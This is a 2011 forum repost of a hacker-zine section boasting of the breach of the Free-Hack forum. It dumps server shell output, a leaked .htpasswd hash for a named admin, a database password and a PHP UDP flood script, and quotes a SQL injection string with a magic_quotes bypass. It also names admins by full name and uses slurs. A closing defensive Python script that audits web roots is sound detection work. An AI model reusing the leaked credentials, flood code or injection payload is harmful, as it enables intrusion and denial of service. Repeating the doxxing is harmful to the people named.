Malaysian WackWall Forum

 Part 6 : hack got hacked.. happy reading anyone!!

wackwall

PostSubject: Part 6 : hack got hacked.. happy reading anyone!!   Thu Jan 27, 2011 3:29 pm

=========================
! ~ free-hack ~
=========================


Many people will wonder why we owned Free-Hack because they always
claimed to have nothing to do with fraud and stuff. In fact this is
the second time we owned them but the first time we go public. The
first time was a few months ago in order to check out what they were
doing in their internal eleet priv8 sections. To our surprise they
really had nothing to do with fraud. Still, they are part of the
problem we call the skiddy breeding of lameness.

Actually, there are a few communities where you can find a few skilled
members. Free-Hack is a forum where you can find two or three. The
rest are simple skidi0ts who have no right to even exist, let alone be
on our internet. Also the admins, particularly "Suicide" aka Mr.
Stefan Finke or "enco" aka Mr. Enrico Costanzo are nothing but
arrogant asshats whose only apparent talent appears to be banning
people. Oh wait, "Suicide" actually HAS skill. Like he mastered the
usage of Hydra and is now able to hax every Teamspeak server. Ph33r.
Don't get us wrong; J0hn.X3r, a newer admin, is actually a pretty good
guy, who had the right spirit and was willing to learn. But getting
promoted to admin in a "hacker" community with ~40k users which has an
"expert" zone for "skilled" members who talk about how to bypass the
Webspell SQL Injection filter is the worst thing he could have done...



Wut? What Firewall? We didn't see no stinking firewall. Owait it's us.
Too ninja again.

$ uname -a
Linux server1.free-hack.com 2.6.18-194.17.1.el5.028stab070.7 #1 SMP Fri Oct 1 14:17:14 MSD 2010 x86_64 x86_64 x86_64 GNU/Linux

$ id
uid=508(freehack) gid=504(freehack) groups=504(freehack)

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
cpanel:x:32001:32001::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshell
cpanelhorde:x:32002:32002::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32003:32003::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32004:32004::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:32005:32005::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:32006:32006::/usr/local/cpanel/3rdparty/mailman/mailman:/usr/local/cpanel/bin/noshell
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
freehack:x:508:504::/home/freehack:/usr/local/cpanel/bin/jailshell
ntp:x:38:38::/etc/ntp:/sbin/nologin
lsadm:x:101:32009::/:/sbin/nologin


$ ls -la /
total 108
drwxr-xr-x 24 root root 4096 Nov 30 02:12 .
drwxr-xr-x 24 root root 4096 Nov 30 02:12 ..
-rw-r--r-- 1 root root 0 Nov 30 02:12 .autofsck
-rw-r--r-- 1 root root 0 Jan 17 2009 .autorelabel
drwx------ 2 root 500 4096 Nov 11 18:43 .spamassassin
lrwxrwxrwx 1 root root 39 Nov 30 02:12 aquota.group -> /proc/vz/vzaquota/00000045/aquota.group
lrwxrwxrwx 1 root root 38 Nov 30 02:12 aquota.user -> /proc/vz/vzaquota/00000045/aquota.user
drwx--x--x 3 root root 4096 Nov 13 09:00 backup
drwxr-xr-x 2 root root 4096 Nov 17 00:24 bin
drwxr-xr-x 2 root root 4096 Jan 26 2010 boot
drwxr-xr-x 7 root root 1900 Nov 30 02:12 dev
drwxr-xr-x 68 root root 12288 Dec 8 21:35 etc
drwx--x--x 8 root root 4096 Nov 14 07:11 home
drwxr-xr-x 9 root root 4096 Nov 12 08:24 lib
drwxr-xr-x 7 root root 4096 Nov 12 08:24 lib64
drwxr-xr-x 2 root root 4096 Jan 26 2010 media
drwxr-xr-x 2 root root 4096 Jan 26 2010 mnt
drwxr-xr-x 10 root root 4096 Nov 12 16:31 opt
dr-xr-xr-x 113 root root 0 Nov 30 02:12 proc
drwxr-x--- 14 root root 4096 Dec 8 21:36 root
drwxr-xr-x 2 root root 4096 Nov 17 00:24 sbin
drwxr-xr-x 5 root root 20480 Dec 8 00:24 scripts
drwxr-xr-x 2 root root 4096 Jan 26 2010 selinux
drwxr-xr-x 2 root root 4096 Jan 26 2010 srv
drwxr-xr-x 3 root root 0 Nov 30 02:12 sys
drwxrwxrwt 10 root root 4096 Dec 8 21:36 tmp
drwxr-xr-x 16 root root 4096 Nov 11 18:17 usr
drwxr-xr-x 22 root root 4096 Nov 11 18:01 var

$ ls -la /home/freehack/public_html
total 3100
drwxr-x--- 34 freehack nobody 4096 Dec 4 22:13 .
drwx--x--x 14 freehack freehack 4096 Dec 7 11:15 ..
-rw-r--r-- 1 freehack freehack 1086 Dec 4 22:27 .htaccess
drwxr-xr-x 11 freehack freehack 4096 Nov 14 09:24 2tgh9322132k322l1sd
-rw-r--r-- 1 freehack freehack 6726 Jan 18 2010 LICENSE
drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _private
drwxr-xr-x 4 freehack freehack 4096 Nov 14 08:28 _vti_bin
drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_cnf
drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_log
drwxr-x--- 2 freehack nobody 4096 Nov 14 07:11 _vti_pvt
drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_txt
-rw-r--r-- 1 freehack freehack 19341 Jan 18 2010 accessmask.php
-rw-r--r-- 1 freehack freehack 12687 Jan 18 2010 admin_rbs.php
-rw-r--r-- 1 freehack freehack 2645 Jan 18 2010 admin_rbs_banner_list.php
-rw-r--r-- 1 freehack freehack 3089 Jan 18 2010 admin_rbs_convert.php
-rw-r--r-- 1 freehack freehack 2667 Jan 18 2010 admin_rbs_d_banner_list.php
-rw-r--r-- 1 freehack freehack 2668 Jan 18 2010 admin_rbs_h_banner_list.php
-rw-r--r-- 1 freehack freehack 2668 Jan 18 2010 admin_rbs_v_banner_list.php
-rw-r--r-- 1 freehack freehack 2681 Jan 18 2010 admin_rbs_x_banner_list.php
-rw-r--r-- 1 freehack freehack 39582 Jan 18 2010 admincalendar.php
-rw-r--r-- 1 freehack freehack 49644 Jan 18 2010 admininfraction.php
-rw-r--r-- 1 freehack freehack 19150 Jan 18 2010 adminlog.php
-rw-r--r-- 1 freehack freehack 8149 Jan 18 2010 adminpermissions.php
-rw-r--r-- 1 freehack freehack 25516 Jan 18 2010 adminreputation.php
-rw-r--r-- 1 freehack freehack 1230 Jan 18 2010 ads.php
-rw-r--r-- 1 freehack freehack 23844 Jan 18 2010 ajax.php
-rw-r--r-- 1 freehack freehack 75511 Jan 18 2010 album.php
drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:04 amecache
-rw-r--r-- 1 freehack freehack 17137 Jan 18 2010 announcement.php
drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:04 archive
-rw-r--r-- 1 freehack freehack 18309 Jan 18 2010 attachment.php
-rw-r--r-- 1 freehack freehack 12512 Jan 18 2010 attachmentpermission.php
-rw-r--r-- 1 freehack freehack 80983 Jan 18 2010 automediaembed_admin.php
-rw-r--r-- 1 freehack freehack 1979 Jan 18 2010 autorefresh_footer.php
-rw-r--r-- 1 freehack freehack 1979 Jan 18 2010 autorefresh_header.php
-rw-r--r-- 1 freehack freehack 1991 Jan 18 2010 autorefresh_navbar.php
-rw-r--r-- 1 freehack freehack 1430 Jan 18 2010 autotagger_ajax.php
-rw-r--r-- 1 freehack freehack 19355 Jan 18 2010 avatar.php
-rw-r--r-- 1 freehack freehack 46771 Jan 18 2010 banner.png
-rw-r--r-- 1 freehack freehack 16461 Jan 18 2010 bbcode.php
drwxr-xr-x 6 freehack freehack 4096 Nov 14 08:06 bilder
drwxr-xr-x 8 freehack freehack 4096 Nov 25 14:18 blog
-rw-r--r-- 1 freehack freehack 14782 Jan 18 2010 bookmarksite.php
-rw-r--r-- 1 freehack freehack 75327 Jan 18 2010 calendar.php
-rw-r--r-- 1 freehack freehack 12083 Jan 18 2010 calendarpermission.php
drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 cgi-bin
-rw-r--r-- 1 freehack freehack 43 Jan 18 2010 clear.gif
drwxr-xr-x 4 freehack freehack 4096 Nov 14 08:08 clientscript
drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:08 control_examples
-rw-r--r-- 1 freehack freehack 14938 Jan 18 2010 converse.php
drwxr-xr-x 3 freehack freehack 4096 Nov 18 14:14 cpa
drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:11 cpm
drwxr-xr-x 7 freehack freehack 4096 Nov 14 08:12 cpstyles
-rw-r--r-- 1 freehack freehack 3317 Jan 18 2010 cron.php
-rw-r--r-- 1 freehack freehack 24049 Jan 18 2010 cronadmin.php
-rw-r--r-- 1 freehack freehack 10734 Jan 18 2010 cronlog.php
-rw-r--r-- 1 freehack freehack 34087 Jan 18 2010 css.php
drwxrwxrwx 3 freehack freehack 4096 Nov 14 08:13 customavatars
drwxrwxrwx 3 freehack freehack 4096 Nov 14 08:13 customgroupicons
drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:13 customprofilepics
-rw-r--r-- 1 freehack freehack 21833 Jan 18 2010 diagnostic.php
-rw-r--r-- 1 freehack freehack 47757 Jan 18 2010 editpost.php
-rw-r--r-- 1 freehack freehack 11748 Jan 18 2010 email.php
-rw-r--r-- 1 freehack freehack 29500 Jan 18 2010 external.php
-rw-r--r-- 1 freehack freehack 9786 Jan 18 2010 faq.php
-rw-r--r-- 1 freehack freehack 22486 Jan 18 2010 favicon.ico
-rw-r--r-- 1 freehack freehack 30137 Jan 18 2010 forum.php
-rw-r--r-- 1 freehack freehack 35658 Jan 18 2010 forumdisplay.php
-rw-r--r-- 1 freehack freehack 30063 Jan 18 2010 forumpermission.php
-rw-r--r-- 1 freehack freehack 15499 Oct 11 10:03 gla_test.php
-rw-r--r-- 1 freehack freehack 39830 Jan 18 2010 global.php
-rw-r--r-- 1 freehack freehack 53 Oct 24 14:48 googlef4001cc5b1db090b.html
-rw-r--r-- 1 freehack freehack 137885 Jan 18 2010 group.php
-rw-r--r-- 1 freehack freehack 24919 Jan 18 2010 group_inlinemod.php
-rw-r--r-- 1 freehack freehack 10524 Jan 18 2010 groupsubscription.php
-rw-r--r-- 1 freehack freehack 25922 Jan 18 2010 help.php
drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:13 htaccess
-rw-r--r-- 1 freehack freehack 9047 Jan 18 2010 image.php
drwxr-xr-x 20 freehack freehack 4096 Nov 14 08:51 images
drwxr-xr-x 5 freehack freehack 4096 Nov 14 08:52 img
drwxr-xr-x 7 freehack freehack 12288 Dec 4 22:09 includes
-rw-r--r-- 1 freehack freehack 19592 Jan 18 2010 index.php
-rw-r--r-- 1 freehack freehack 43829 Jan 18 2010 infraction.php
-rw-r--r-- 1 freehack freehack 182759 Jan 18 2010 inlinemod.php
-rw-r--r-- 1 freehack freehack 10342 Jan 18 2010 joinrequests.php
-rw-r--r-- 1 freehack freehack 10222 Jan 18 2010 login.php
drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:59 madp
-rw-r--r-- 1 freehack freehack 17066 Jan 18 2010 member.php
-rw-r--r-- 1 freehack freehack 15931 Jan 18 2010 member_inlinemod.php
-rw-r--r-- 1 freehack freehack 35901 Jan 18 2010 memberlist.php
-rw-r--r-- 1 freehack freehack 23867 Jan 18 2010 misc.php
-rw-r--r-- 1 freehack freehack 63331 Jan 18 2010 moderation.php
-rw-r--r-- 1 freehack freehack 6756 Jan 18 2010 moderator.php
-rw-r--r-- 1 freehack freehack 18477 Jan 18 2010 newattachment.php
-rw-r--r-- 1 freehack freehack 37104 Jan 18 2010 newreply.php
-rw-r--r-- 1 freehack freehack 18911 Jan 18 2010 newthread.php
-rw-r--r-- 1 freehack freehack 5725 Jan 18 2010 nex_stats_tend_classes.php
drwxr-xr-x 9 freehack freehack 4096 Nov 25 18:38 nopaste
-rw-r--r-- 1 freehack freehack 12095 Jul 20 15:01 oks.png
-rw-r--r-- 1 freehack freehack 19604 Jan 18 2010 online.php
-rw-r--r-- 1 freehack freehack 7696 Jan 18 2010 payment_gateway.php
-rw-r--r-- 1 freehack freehack 11910 Jan 18 2010 payments.php
-rw-r--r-- 1 freehack freehack 7889 Jan 18 2010 picture.php
-rw-r--r-- 1 freehack freehack 22040 Jan 18 2010 picture_inlinemod.php
-rw-r--r-- 1 freehack freehack 25311 Jan 18 2010 picturecomment.php
-rw-r--r-- 1 freehack freehack 27415 Jan 18 2010 poll.php
-rw-r--r-- 1 freehack freehack 17744 Jan 18 2010 post_thanks.php
-rw-r--r-- 1 freehack freehack 9512 Jan 18 2010 posthistory.php
-rw-r--r-- 1 freehack freehack 74369 Jan 18 2010 postings.php
-rw-r--r-- 1 freehack freehack 4763 Jan 18 2010 pprm.php
-rw-r--r-- 1 freehack freehack 6594 Jan 18 2010 printthread.php
-rw-r--r-- 1 freehack freehack 70748 Jan 18 2010 private.php
-rw-r--r-- 1 freehack freehack 152336 Jan 18 2010 profile.php
-rw-r--r-- 1 freehack freehack 2712 Feb 3 2010 rbs_banner.php
-rw-r--r-- 1 freehack freehack 39751 Jan 18 2010 register.php
-rw-r--r-- 1 freehack freehack 5688 Jan 18 2010 report.php
-rw-r--r-- 1 freehack freehack 13720 Jan 18 2010 reputation.php
-rw-r--r-- 1 freehack freehack 124717 Jan 18 2010 search.php
-rw-r--r-- 1 freehack freehack 20694 Jan 18 2010 sendmessage.php
-rw-r--r-- 1 freehack freehack 10009 Jan 18 2010 showgroups.php
-rw-r--r-- 1 freehack freehack 11374 Jan 18 2010 showpost.php
-rw-r--r-- 1 freehack freehack 73470 Jan 18 2010 showthread.php
drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:59 signaturepics
drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:59 sitemap
-rw-r--r-- 1 freehack freehack 32848 Jan 18 2010 subscription.php
-rw-r--r-- 1 freehack freehack 51471 Sep 11 14:10 support.php
-rw-r--r-- 1 freehack freehack 13365 Jan 18 2010 tags.php
-rw-r--r-- 1 freehack freehack 8692 Jan 18 2010 threadrate.php
-rw-r--r-- 1 freehack freehack 12415 Jan 18 2010 threadtag.php
drwxrwxrwx 2 freehack freehack 4096 Dec 8 03:30 tmp
-rw-r--r-- 1 freehack freehack 34512 Jan 18 2010 usercp.php
-rw-r--r-- 1 freehack freehack 19098 Jan 18 2010 usernote.php
drwxrwxrwx 7 freehack freehack 4096 Nov 14 09:06 vboptimise
drwxr-xr-x 4 freehack freehack 4096 Dec 4 22:11 vbseo
-rw-r--r-- 1 freehack freehack 45172 Sep 14 01:00 vbseo.php
drwxr-xr-x 4 freehack freehack 4096 Nov 14 09:14 vbseo_sitemap
-rw-r--r-- 1 freehack freehack 4221 Sep 14 01:00 vbseocp.php
-rw-r--r-- 1 freehack freehack 27357 Jan 18 2010 visitormessage.php
-rw-r--r-- 1 freehack freehack 8431 Jan 18 2010 whoquotedme.php
-rw-r--r-- 1 freehack freehack 334 Oct 7 11:32 x.php


RETARDED PHP CODE ALERT!

$ cat x.php
|if(!|$_GET['target'])
{
die('no target ip specified!');
}
|$target = |$_GET['t'];

|$sock=socket_create(AF_INET,SOCK_DGRAM,SOL_UDP);

if(!|$sock) die(__LINE__);

|$data='';
for(|$i=0;|$i<1400;|$i++)
{
|$data.=chr(rand(0,255));
}

while(true)
{
if(!socket_sendto(|$sock,|$data,strlen(|$data),0,|$target,9)) die(__LINE__);
echo('.');
}

|?>



$ cd 2tgh9322132k322l1sd

$ ls
total 252
drwxr-xr-x 11 508 504 4096 Nov 14 09:24 .
drwxr-x--- 34 508 99 4096 Dec 4 22:13 ..
-rw-r--r-- 1 508 504 129 Nov 14 09:24 .htaccess
-rw-r--r-- 1 508 504 42 Nov 14 09:24 .htpasswd
drwxr-xr-x 2 508 504 4096 Nov 14 07:22 ReadMe
-rw-r--r-- 1 508 504 3661 Nov 14 09:20 config.php
-rw-r--r-- 1 508 504 58442 Sep 22 2009 config_overview.php
drwxr-xr-x 4 508 504 4096 Nov 14 07:16 css
-rw-r--r-- 1 508 504 19372 Sep 22 2009 dump.php
-rw-r--r-- 1 508 504 512 Nov 14 09:20 error_log
-rw-r--r-- 1 508 504 22059 Sep 22 2009 filemanagement.php
-rw-r--r-- 1 508 504 640 Sep 22 2009 help.php
drwxr-xr-x 2 508 504 4096 Nov 14 07:17 images
drwxr-xr-x 4 508 504 4096 Nov 14 07:18 inc
-rw-r--r-- 1 508 504 871 Sep 22 2009 index.php
-rw-r--r-- 1 508 504 24781 Sep 22 2009 install.php
drwxr-xr-x 4 508 504 4096 Nov 14 07:18 js
drwxr-xr-x 17 508 504 4096 Nov 14 07:22 language
-rw-r--r-- 1 508 504 5461 Sep 22 2009 log.php
-rw-r--r-- 1 508 504 1256 Sep 22 2009 main.php
-rw-r--r-- 1 508 504 3930 Sep 22 2009 menu.php
drwxr-xr-x 2 508 504 4096 Nov 14 07:22 msd_cron
-rw-r--r-- 1 508 504 776 Sep 22 2009 refresh_dblist.php
-rw-r--r-- 1 508 504 15762 Sep 22 2009 restore.php
-rw-r--r-- 1 508 504 10187 Sep 22 2009 sql.php
drwxr-xr-x 5 508 504 4096 Nov 14 07:22 tpl
drwxrwxrwx 5 508 504 4096 Nov 14 09:20 work

$ cat .htpasswd
Suicide:$1$GTs9Hns/$lPMGV.EaLgyqwNxgTQSwf1

$ cat config.php
// MySQL Dumper Configuration

// Host-Adress, default 'localhost'
$config['dbhost'] = 'localhost';
// port - if empty, mysql uses default
$config['dbport'] = '';
// socket - if empty, mysql uses default
$config['dbsocket'] = '';

// Username
$config['dbuser'] = 'freehack';
//User-Pass. For no Password leave empty
$config['dbpass'] = '7qm#2nwAc$oU';

//Speed Values between 50 and 1000000
//use low values if you have bad connection or slow machines
$config['minspeed']=100;
$config['maxspeed']=50000;

// Interface language and style
$config['language']='en';
$config['theme']='msd';

//Shows the Serveradress if 1
$config['interface_server_caption']=1;
$config['interface_server_captioncolor']='#ff9966';
//Position of the Serveradress 0=left, 1=right
$config['interface_server_caption_position']=0;

//Height of the SQL-Box in Mini-SQL in pixel
$config['interface_sqlboxsize']=70;
$config['interface_table_compact']=0;

// Determine the maximum Amount for Memory Use in Bytes, 0 for no limit
$config['memory_limit']=100000;

// For gz-Compression set to 1, without compression set to 0
$config['compression']=1;

//Refreshtime for MySQL processlist in msec, use any value >1000
$config['processlist_refresh']=3000;

$config['empty_db_before_restore']=0;
$config['optimize_tables_beforedump']=1;
$config['stop_with_error']=1;

// For sending a mail after backup set send_mail to 1, otherless set to 0
$config['send_mail']=0;
// Attach the backup 0=no 1=yes
$config['send_mail_dump']=0;
// set the recieve adress for the mail
$config['email_recipient']='';
$config['email_recipient_cc']='';
// set the sender adress (the script)
$config['email_sender']='';

//max. Size of Email-Attach, here 3 MB
$config['email_maxsize1']=3;
$config['email_maxsize2']=2;

// FTP Server Configuration for Transfer
$config['ftp_transfer'][0]=0;
$config['ftp_timeout'][0]=30;
$config['ftp_useSSL'][0]=0;
$config['ftp_mode'][0]=0;
$config['ftp_server'][0]=''; // Adress of FTP-Server
$config['ftp_port'][0]='21'; // Port
$config['ftp_user'][0]=''; // Username
$config['ftp_pass'][0]=''; // Password
$config['ftp_dir'][0]=''; // Upload-Directory

$config['ftp_transfer'][1]=0;
$config['ftp_timeout'][1]=30;
$config['ftp_useSSL'][1]=0;
$config['ftp_mode'][1]=0;
$config['ftp_server'][1]='';
$config['ftp_port'][1]='21';
$config['ftp_user'][1]='';
$config['ftp_pass'][1]='';
$config['ftp_dir'][1]='';

$config['ftp_transfer'][2]=0;
$config['ftp_timeout'][2]=30;
$config['ftp_useSSL'][2]=0;
$config['ftp_mode'][2]=0;
$config['ftp_server'][2]='';
$config['ftp_port'][2]='21';
$config['ftp_user'][2]='';
$config['ftp_pass'][2]='';
$config['ftp_dir'][2]='';

//Multipart 0=off 1=on
$config['multi_part']=0;
$config['multipartgroesse1']=1;
$config['multipartgroesse2']=2;
$config['multipart_groesse']=0;

//Auto-Delete 0=off 1=on
$config['auto_delete']=0;
$config['max_backup_files']=3;

//configuration file
$config['cron_configurationfile']='mysqldumper.conf.php';
//path to perl, for windows use e.g. C:perlbinperl.exe
$config['cron_perlpath']='/usr/bin/perl';
//mailer use sendmail(1) or SMTP(0)
$config['cron_use_sendmail']=1;
//path to sendmail
$sendmail_path=ini_get('sendmail_path');
$config['cron_sendmail']=$sendmail_path>'' ? $sendmail_path: '/usr/lib/sendmail -t -oi -oem';

//adress of smtp-server
$config['cron_smtp']='localhost';
//smtp-port
$config['cron_smtp_port']=25;
$config['cron_extender']=0;
$config['cron_compression']=1;
$config['cron_printout']=1;
$config['cron_completelog']=1;
$config['cron_comment']='';
$config['multi_dump']=0;
$config['logcompression']=1;
$config['log_maxsize1']=1;
$config['log_maxsize2']=2;
$config['log_maxsize']=1048576;


________________________
| |
| FREE-HACK LIST OF LAME |
|________________________|




We think that novaca!ne's magic_quotes bypass is quite representative
for this group:

--snip snip--

Bypass magic_quotes (novaca!ne)
magic_quotes is a php setting (php.ini).
It causes that every ' (single-quote), " (double quote) and \ (backslash)
are escaped with a backslash automatically, a weak but well-known securing method.
This is how to bypass it:
Use the function called “String.fromCharCode()”, you need to translate your MySQL command
into ASCII (http://www.asciizeichen.de/tabelle.html) and put it as input into the handling.
‘ OR ‘a’ = ‘a equals
String.fromCharCode(8216, 32, 79, 82, 32, 8216, 97, 8217, 32, 61, 32, 8216, 97)

--snip snip--

novaca!ne is (next to fred777) of course, our new security superhero!
Congratz, faggot...

Finally we shouldn't forget our old fag superhero fred777, who helped
us to understand how we could get every source code of a page. This
sounds pretty hard, but fred777 shows his priv8 techniques (we fear
them):

--snip snip--
#########################################################
# Sourcecode disclosure by social engineering
# tested on NPD
#########################################################

Intro:
I'll describe a case here that I recently had in front of me.
By chance I was once again on the many NPD sites, looking for holes.
On one subpage I did find something, or at least it looked
as if there was an SQL injection there.

As soon as the limit parameter was passed incorrectly, the
usual SQL error appeared:


What we learned is:
- If we write an email to an admin we always get the source code
- fred777 uses tools to exploit some sql injection

"o_O", one of the banned users puts it nicely: "being lame is one of
fred777's master skills". Just to inform you: We owned Free-Hack with
this technique of course.


Right, who deserves it? Correct! Suicide and enco for being badass
super high skilled computer professionals ... NOT

This is a warning Free-Hack. Continue existing and we will show no
mercy. Especially you, J0hn.X3r. Take your chance, go and grow up.


That's all for now. We hope that those we have owned understood the
warning and that those who already enjoyed issue one were satisfied
with this release. We will take a little break for now and go to
Hawaii to get our asses drunk. But do not fear. There will always be
enough time for us to audit more code, write more 0day and own more
idiots. We will always watch the scene and act if we are needed. There
is still a lot to do and the winter of hax is not over yet. So do
expect us.
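
A defender's reading of the web-root listing in the post, which shows several drwxrwxrwx directories, an .htpasswd stored under public_html and the stray x.php. This is an added example, not part of the original post or of the zine it reproduces: a small audit that walks a document root and flags those three conditions. The function names, rule names and the temporary sample tree are constructed for illustration.

```python
import os
import re
import stat
import tempfile

CREDENTIAL_FILES = {".htpasswd"}  # credential stores that do not belong under a docroot

# Heuristics for a PHP file that sends UDP datagrams from a loop with no exit condition.
UDP_SOCKET = re.compile(r"socket_create\s*\([^)]*SOCK_DGRAM", re.I)
SEND_CALL = re.compile(r"socket_sendto\s*\(", re.I)
ENDLESS_LOOP = re.compile(r"while\s*\(\s*(true|1)\s*\)|for\s*\(\s*;\s*;\s*\)", re.I)


def audit_webroot(root):
    """Return sorted (rule, relative_path) findings for the tree under root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue  # a symlink's own mode says nothing about its target
            mode = os.lstat(path).st_mode
            # Writable by "other" and no sticky bit: any local account can plant files.
            if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
                findings.append(("world-writable-dir", os.path.relpath(path, root)))
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if name in CREDENTIAL_FILES:
                findings.append(("credential-file-in-webroot", rel))
            if name.lower().endswith(".php"):
                with open(path, "r", errors="replace") as fh:
                    src = fh.read()
                if all(rx.search(src) for rx in (UDP_SOCKET, SEND_CALL, ENDLESS_LOOP)):
                    findings.append(("php-udp-sender-in-loop", rel))
    return sorted(findings)


def build_sample_tree():
    """Create a small constructed docroot in a temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, mode in (("uploads", 0o777), ("admintool", 0o755)):
        os.mkdir(os.path.join(root, rel))
        os.chmod(os.path.join(root, rel), mode)  # explicit, independent of umask
    files = {
        "index.php": "<?php echo 'hello'; ?>\n",
        "admintool/.htpasswd": "user:PLACEHOLDER-HASH\n",
        # Constructed fixture carrying only the markers the rules look for.
        "stray.php": "<?php $s = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);\n"
                     "while (true) { socket_sendto($s, $d, strlen($d), 0, $t, 9); }\n",
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rule, rel in audit_webroot(build_sample_tree()):
        print(f"{rule:28} {rel}")
```

The sticky-bit exception keeps directories such as the /tmp entry (drwxrwxrwt) in the root listing out of the findings; the PHP rule is a text heuristic and should feed review, not automatic deletion.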